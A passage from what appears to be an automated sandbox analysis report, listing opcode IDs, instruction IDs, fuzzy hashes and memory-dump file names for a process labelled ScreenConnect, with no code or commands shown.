                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ef8f8595c5f6bf0208491f5e07a730537e3926efcc03f1baa0a224e8e0a0cc36
                                                                                                                                                  • Instruction ID: e37c9ff1cc137db1301162e07dcd4e86bc12a3a5fab0d0e287bbfbe1a4c78390
                                                                                                                                                  • Opcode Fuzzy Hash: ef8f8595c5f6bf0208491f5e07a730537e3926efcc03f1baa0a224e8e0a0cc36
                                                                                                                                                  • Instruction Fuzzy Hash: 69515630E002099FDB01DFA8D894BDDBBB2FF98300F519559E505BB291EB74A995CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bdea3684731a4e7ec6f4676836826ef2eaf59a0a7119bad80faebea029dceda9
                                                                                                                                                  • Instruction ID: 2c08a8a9ed77c86f91d4ccee9240b6ba96410fba9c89a51b48b6aa8781f279ee
                                                                                                                                                  • Opcode Fuzzy Hash: bdea3684731a4e7ec6f4676836826ef2eaf59a0a7119bad80faebea029dceda9
                                                                                                                                                  • Instruction Fuzzy Hash: F741BF30600B458FCB35CF6DC844696BBF2EF8A324B144A5DD1969B6A2D770E90ACF80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d6e50faaa3267f0229dc7eb26b92854d099296ac4c35f90c3c98b125a3b1fab8
                                                                                                                                                  • Instruction ID: 5f704c9b39d9aae7c05152e6394ee8278653df94391b070896ffbf7ae2d316eb
                                                                                                                                                  • Opcode Fuzzy Hash: d6e50faaa3267f0229dc7eb26b92854d099296ac4c35f90c3c98b125a3b1fab8
                                                                                                                                                  • Instruction Fuzzy Hash: 1E415071E0125A9BEF14DFA9C990BDEBBB6EF89700F148129E505B7240DB70A946CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 96adf2f2afb9633f9a81153003cbdac2e7bc52b74355710a5a5f8d57cee4afd4
                                                                                                                                                  • Instruction ID: dc755a34c5f91b9ffdbeb7d6796175bd7698aec679ad70f711565412fcaf6500
                                                                                                                                                  • Opcode Fuzzy Hash: 96adf2f2afb9633f9a81153003cbdac2e7bc52b74355710a5a5f8d57cee4afd4
                                                                                                                                                  • Instruction Fuzzy Hash: 36413C317102068FDB16EF78E49466E7BE2EF88250B54847AD506DB365EF75EC01CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 68f10cbf0ec1fb5c76c32fd68bcb34936ecaedfebb003b4febdff272176699c0
                                                                                                                                                  • Instruction ID: b924de9c9f4aa733bcc6d0c64f19eaf5ac6991c31854de36c80289e4f5298c67
                                                                                                                                                  • Opcode Fuzzy Hash: 68f10cbf0ec1fb5c76c32fd68bcb34936ecaedfebb003b4febdff272176699c0
                                                                                                                                                  • Instruction Fuzzy Hash: E0419C31A00205CBDF15EF68E4946ADBBA6FFC4301F14C569D906AB246DF34EC068F90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5c71fc593e0c76c2778cdafa06cbe7336a87ae209aa36e117fd9d51b11da7863
                                                                                                                                                  • Instruction ID: 9fd6955abd3b9d80fb1340b73c12b37a61da1bd1c4dcdbc11a00674ac1e56620
                                                                                                                                                  • Opcode Fuzzy Hash: 5c71fc593e0c76c2778cdafa06cbe7336a87ae209aa36e117fd9d51b11da7863
                                                                                                                                                  • Instruction Fuzzy Hash: 37415932B012918FDB209B28D55476FB7E2EF84318F14CA6AD856CB392DB30CC85C791
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 50a45ca6338ebd049e45d4b848b8186ad6c8add0402c64302fcfb6f9928c60d3
                                                                                                                                                  • Instruction ID: a508f4c1a9797baa246700ee62bffecc202372650b3ac7339cd8fa8ee46d008a
                                                                                                                                                  • Opcode Fuzzy Hash: 50a45ca6338ebd049e45d4b848b8186ad6c8add0402c64302fcfb6f9928c60d3
                                                                                                                                                  • Instruction Fuzzy Hash: C04149307102159FDB58DB69D864AAEBBE2FF88614F15456DE406EB3A0DF70EC04CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 298e83efd824c7149e383c485d715808779aa5c1a5ed03208884b22ce2f61b0f
                                                                                                                                                  • Instruction ID: 2a64bdf49ca28039289678ade70849999d50be582629254c9b023176ce889e2b
                                                                                                                                                  • Opcode Fuzzy Hash: 298e83efd824c7149e383c485d715808779aa5c1a5ed03208884b22ce2f61b0f
                                                                                                                                                  • Instruction Fuzzy Hash: 5E4148307102159FDB18DB69D454AAEBBE2FF88610F15456CE406DB3A0DF70EC04CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3216133c6b188e31ce1a0bb9fc456ab8e490450358e288cae95a5b8a0e36a898
                                                                                                                                                  • Instruction ID: 02fe419edd34cd28dd03c72a04f6ae5f6b901a9ec2c00814cf9b3331818a754c
                                                                                                                                                  • Opcode Fuzzy Hash: 3216133c6b188e31ce1a0bb9fc456ab8e490450358e288cae95a5b8a0e36a898
                                                                                                                                                  • Instruction Fuzzy Hash: 3A315C30B102058BEF149EA9C4546AFFBF6EF89254F10846AE50AE7354DB74ED008B90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 96f66a39be7c282632cec6979250895647cf11716920854b4e1a774ea56a71e7
                                                                                                                                                  • Instruction ID: 6965ac178ae8285015a9ecbe2557a0100ec738c5e1a2f3807ec4646327240da5
                                                                                                                                                  • Opcode Fuzzy Hash: 96f66a39be7c282632cec6979250895647cf11716920854b4e1a774ea56a71e7
                                                                                                                                                  • Instruction Fuzzy Hash: 0B41BB30A00359DFEF609B68D804BAEBBB9FF44300F0085EAC508A7280DB755E49CF92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 18324faf397a4803f3f6756af192a54ad37dd6045f8ea23a31e7a30103048afd
                                                                                                                                                  • Instruction ID: 73acc1b78f48a8ca1044f73128b99d9145290b2cce9f66b58041e3a2f08a91b2
                                                                                                                                                  • Opcode Fuzzy Hash: 18324faf397a4803f3f6756af192a54ad37dd6045f8ea23a31e7a30103048afd
                                                                                                                                                  • Instruction Fuzzy Hash: 70311A70600B069FDB30CF6DD8846A6BBF2EF89314F104A1CE1969B6A5D770E946CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 559efed2f0893dc5b50a86f7b11c30d90f01d46a2afd7e5ebbf672fa8f2160ee
                                                                                                                                                  • Instruction ID: fc8c6a110a19366274ef6bb5f5507e1f403c5ee9c114aaab4a02c4a0e23e4c8f
                                                                                                                                                  • Opcode Fuzzy Hash: 559efed2f0893dc5b50a86f7b11c30d90f01d46a2afd7e5ebbf672fa8f2160ee
                                                                                                                                                  • Instruction Fuzzy Hash: A0315AB1D043099FCF14DFAAD4446EEBFF4EF88320F10846AD519A7340DB79A9468BA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fad65d33e09165ef9a86b4aee9d765513dbf165d1053ed0057ebb6dce9e95c92
                                                                                                                                                  • Instruction ID: 8b8f7d8fecfbf70f3def9ebd750ce68bd5a2210ccfbdfbcc938374c945d6710d
                                                                                                                                                  • Opcode Fuzzy Hash: fad65d33e09165ef9a86b4aee9d765513dbf165d1053ed0057ebb6dce9e95c92
                                                                                                                                                  • Instruction Fuzzy Hash: 1A31D7306007018FDB30DF2AC854A6ABBF1EF89354B144A6DD596DB7A5DB30F946CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3e7184bb5c68c3a1d3080e9699d79e7ec62fe9ca8b4be2cf2144a32de63280c3
                                                                                                                                                  • Instruction ID: 9023b9ca24e0494d85c964987076a08511f026cb69fc7dd24716ae7c126dc0d1
                                                                                                                                                  • Opcode Fuzzy Hash: 3e7184bb5c68c3a1d3080e9699d79e7ec62fe9ca8b4be2cf2144a32de63280c3
                                                                                                                                                  • Instruction Fuzzy Hash: AC313470A04345EFCF04DFB4E94869EBBB5FF49214B1041AADA1AD7241DB34DD01CB61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e8b4820eb8d55c6c32c8868245cb423f1c20cf576674edf19400da84dca97529
                                                                                                                                                  • Instruction ID: 237fdf56f47681451e2c7ed78c1cae7d6886381446888c6d24e2ac3e994d40ef
                                                                                                                                                  • Opcode Fuzzy Hash: e8b4820eb8d55c6c32c8868245cb423f1c20cf576674edf19400da84dca97529
                                                                                                                                                  • Instruction Fuzzy Hash: 0B31D470600B468FDB30DF6DD8446AABBF2EF89324B104A1CD1969B6A5D770E946CF80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c7d36db64fc45ad1b362810d470fa529c02e1f72c719fc5cd7af77b7aef013e6
                                                                                                                                                  • Instruction ID: 80f640e89c6ffddab4cccfc24aca3173069d4f7f7521a17210ac2d2a5697cea4
                                                                                                                                                  • Opcode Fuzzy Hash: c7d36db64fc45ad1b362810d470fa529c02e1f72c719fc5cd7af77b7aef013e6
                                                                                                                                                  • Instruction Fuzzy Hash: 893158706007018FDB34CF29C898A6ABBF1FF89314B144A1CE49ADB3A0D730E945CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f0d6c72e68e509c6fdb6c0aac37305083e7210f49c3e52ac2e45ce105bda7971
                                                                                                                                                  • Instruction ID: 9e0f9d7deca964edae2dd830083c80d50ec4523950fa67502ba8e67748db901a
                                                                                                                                                  • Opcode Fuzzy Hash: f0d6c72e68e509c6fdb6c0aac37305083e7210f49c3e52ac2e45ce105bda7971
                                                                                                                                                  • Instruction Fuzzy Hash: 31310930600B018FDB30DF6AD84466ABBF2EF99310B104A1CD5A69B7A1D730E946CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d54e5b33eea6b8f64a346cc21447cbc41bb8bc21a2cabf1009a8538a95c1b3a
                                                                                                                                                  • Instruction ID: c441c451efa1ad68666336e416057d63e31a3ced618d3e2d8b9e0de23f0b0463
                                                                                                                                                  • Opcode Fuzzy Hash: 2d54e5b33eea6b8f64a346cc21447cbc41bb8bc21a2cabf1009a8538a95c1b3a
                                                                                                                                                  • Instruction Fuzzy Hash: 89219531B012059BDB58DAB9C855BAFBB76BBC8650F14842DE106E7284EE71EC11CB54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0ca2d0c814b72a5cfa980f1582cbb62181b40716b2fc977d8d49f37f4bdd33fb
                                                                                                                                                  • Instruction ID: aaf122b68204766689e864f0cb0f6caab7003633fa9759ac57c6a8bc7d7e7498
                                                                                                                                                  • Opcode Fuzzy Hash: 0ca2d0c814b72a5cfa980f1582cbb62181b40716b2fc977d8d49f37f4bdd33fb
                                                                                                                                                  • Instruction Fuzzy Hash: 6E2145B6104204EFDB05DF44D9C0BB6BF65FB88328F20856DE90A8B256C336D45ACAA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 886f04dc74cb0bcfeeacfc4466cb19c7a1db0505a301e6b5be9bb23d9616d189
                                                                                                                                                  • Instruction ID: de19c531eff1b4db6ca9c609714265c84ac48431eae3d7df91e7535cd5bee993
                                                                                                                                                  • Opcode Fuzzy Hash: 886f04dc74cb0bcfeeacfc4466cb19c7a1db0505a301e6b5be9bb23d9616d189
                                                                                                                                                  • Instruction Fuzzy Hash: 46210871B002069BEF04D764E8906AD7FA2FFD5610F54851AD505EB381DFB4AC06DBD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1d5fd9c3905d2788a73414bd53fde08fa8fb3213b9eed303a5542475f2efd4f6
                                                                                                                                                  • Instruction ID: 7d88037584ddff226e55c9d570b54de7397012b925c62e9f0bc3d5bc50055527
                                                                                                                                                  • Opcode Fuzzy Hash: 1d5fd9c3905d2788a73414bd53fde08fa8fb3213b9eed303a5542475f2efd4f6
                                                                                                                                                  • Instruction Fuzzy Hash: 6C21D175A00211DFCF249BB8E9485AEBBB1FF592247148165D91AD7394DB30DC02CB51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0884f1670db5fac5238299b5a629619f84c19714f9106047b022284ab840261
                                                                                                                                                  • Instruction ID: 292d95fa8cb32a7c8b0aaab06b15a1e4095b846077b8cf69c5f2081d76a5f126
                                                                                                                                                  • Opcode Fuzzy Hash: e0884f1670db5fac5238299b5a629619f84c19714f9106047b022284ab840261
                                                                                                                                                  • Instruction Fuzzy Hash: B3216671A002099FDB04DB68DC919EEBBF5FF89314B50852AE519EB311EB70ED06DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ef89d2ed8db925cd5747b1083a965a3bd8e33c2d0005f8fbd343b1193b91ab85
                                                                                                                                                  • Instruction ID: fed7ad91134dc05794e636a5109ec27e353c674a47b4c22f3eb4649c0b560f4b
                                                                                                                                                  • Opcode Fuzzy Hash: ef89d2ed8db925cd5747b1083a965a3bd8e33c2d0005f8fbd343b1193b91ab85
                                                                                                                                                  • Instruction Fuzzy Hash: 502116B68002499FDF10CF9AD844ADEBFF5FF88310F14841AE918A7211D379A556CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: af957bf9bff053b38ba07d31a4d45d2130f51427eee903e278ee35f2f5a85e02
                                                                                                                                                  • Instruction ID: 7c29dea0a39e09029bc390f9e7034fc1a699b5c62223faea1883d03615b19cd1
                                                                                                                                                  • Opcode Fuzzy Hash: af957bf9bff053b38ba07d31a4d45d2130f51427eee903e278ee35f2f5a85e02
                                                                                                                                                  • Instruction Fuzzy Hash: 55213E306006059FDB34CF29D84469ABBF1EF89720F108A2DD593976A1DB31F95ACF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b6e8db3519e46e66c6815031cf9b925a1c472ea04d2d832c15f511f4a591654d
                                                                                                                                                  • Instruction ID: 876245b31d2de1b145a9e29587d5dbac958badd02f81f4e7092af42c0411733c
                                                                                                                                                  • Opcode Fuzzy Hash: b6e8db3519e46e66c6815031cf9b925a1c472ea04d2d832c15f511f4a591654d
                                                                                                                                                  • Instruction Fuzzy Hash: AD2125B680024ADFDF10CF9AD944ADEBFF5FB88310F14852AE914A7210D379A555CFA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fd5f24b9bd62c8d89025c64604bfebc52322c79f0e7cebdf75ee7c0c29d0c306
                                                                                                                                                  • Instruction ID: c8be62f30e2d84b837c2ceb75bc679047b5a62f5ad0c05a379f54ff4ce7c756f
                                                                                                                                                  • Opcode Fuzzy Hash: fd5f24b9bd62c8d89025c64604bfebc52322c79f0e7cebdf75ee7c0c29d0c306
                                                                                                                                                  • Instruction Fuzzy Hash: 301184316006069FDB05DBA8EC919AEBBB1FFC9214B40856AD509EB321DB70AD05DB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dfd68c4256e407f9f9cb4ad462b6ddcc850d22407ec2e67032a52c61f6a99344
                                                                                                                                                  • Instruction ID: a5807984b01ca9af3352f07ef91ba61745449388313c0500b91fd9300e82f552
                                                                                                                                                  • Opcode Fuzzy Hash: dfd68c4256e407f9f9cb4ad462b6ddcc850d22407ec2e67032a52c61f6a99344
                                                                                                                                                  • Instruction Fuzzy Hash: 9F21EA71A01705CFDB24DF6DD844A6ABBF1FF48310B108A2DD5A69B694DB74E901CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dd4da5464d265d174e413af30299239c4fb7346193ed1987b6cef27a91ca786e
                                                                                                                                                  • Instruction ID: 158357353628dad4ae81fe41ccc00def0d3f5c16dc6d8701bd918dd9bc508de2
                                                                                                                                                  • Opcode Fuzzy Hash: dd4da5464d265d174e413af30299239c4fb7346193ed1987b6cef27a91ca786e
                                                                                                                                                  • Instruction Fuzzy Hash: 82110232A0D3811FDB1B473868604AB7FB5EE8612430945EFD589CB253EE659C0AC7A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f5e25c997521a6cf9de3b91c8213d65117c304c288ca8a8d5c7f0b42b354f350
                                                                                                                                                  • Instruction ID: d5cb3481788408cca94049ceac4f78b3c0c0e4e9a26c5cabd060e3939dd643d9
                                                                                                                                                  • Opcode Fuzzy Hash: f5e25c997521a6cf9de3b91c8213d65117c304c288ca8a8d5c7f0b42b354f350
                                                                                                                                                  • Instruction Fuzzy Hash: 5D211A31D1070A99CB51EFB9D8505EEF7B4EF99310F10C62AD559B7111FB70A295CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 58e09e53f44ffe902cd9204e721f29e6933acf246ecf7dd90a2b4bc29303316f
                                                                                                                                                  • Instruction ID: 819c279ddd497f020cff3d2d29a6e7dcc13913cbb6be39b8ba7ea465c72cd5d3
                                                                                                                                                  • Opcode Fuzzy Hash: 58e09e53f44ffe902cd9204e721f29e6933acf246ecf7dd90a2b4bc29303316f
                                                                                                                                                  • Instruction Fuzzy Hash: 6E119031700206ABEF04EB68E980AAE7BE2EFD5610F509529D505EB384DF74BC059BD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 18672ade46e518a4606383393483f89e704827381a6f768fcaa3007175e4f7a2
